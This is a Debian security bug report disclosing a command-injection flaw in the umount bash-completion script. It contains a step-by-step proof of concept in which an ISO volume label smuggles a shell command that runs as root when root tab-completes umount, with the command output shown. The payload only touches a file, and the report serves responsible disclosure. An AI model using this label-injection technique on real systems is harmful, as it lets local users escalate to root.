Package: bash-completion Version: 1:2.1-4.3 Severity: grave Tags: security Hi,
when bash-completion is installed, it uses /usr/share/bash-completion/completions/umount from umount package to provide autocompletion. This script does not escape mount paths correctly, so it allows a local user with rights to mount filesystems to execute commands in the context of the umount user (probably root). Unprivileged users can mount filesystems with custom mountpoints using udisks2, FUSE or with the help of desktop environments. Example: as regular user: ------------------------------ $ mkdir empty $ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty I: -input-charset not specified, using utf-8 (detected in locale settings) Total translation table size: 0 Total rockridge attributes bytes: 0 Total directory bytes: 0 Path table size(bytes): 10 Max brk space used 0 174 extents written (0 MB) $ udisksctl loop-setup -f test.iso Mapped file test.iso as /dev/loop0. (if not mounted by automounter already) $ udisksctl mount -b /dev/loop0 Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd). ------------------------------ as different user or even root: ------------------------------ # ls -la total 28 drwxr-xr-x 2 root root 4096 Feb 14 10:00 . drwxrwxrwt 29 root root 24576 Feb 14 10:00 .. # umount <TAB> ^C # ls -la total 28 drwxr-xr-x 2 root root 4096 Feb 14 10:01 . drwxrwxrwt 29 root root 24576 Feb 14 10:00 .. -rw-r--r-- 1 root root 0 Feb 14 10:01 foo ------------------------------ I tested it using latest Debian GNU/Linux 9.3 (stretch) using default installation with desktop environment. Involved packages: mount 2.29.2-1 bash 4.4-5 bash-completion 1:2.1-4.3 genisoimage 9:1.1.11-3+b2 udisks2 2.1.8-1 uname -a Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux It seems to be fixed in upstream util-linux already because of a similar bugfix: https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7 Björn Bosselmann G DATA Software AG -- System Information: Debian Release: 9.3 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE= (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages bash-completion depends on: ii bash 4.4-5 ii dpkg 1.18.24 bash-completion recommends no packages. bash-completion suggests no packages. -- no debconf information
signature.asc
Description: OpenPGP digital signature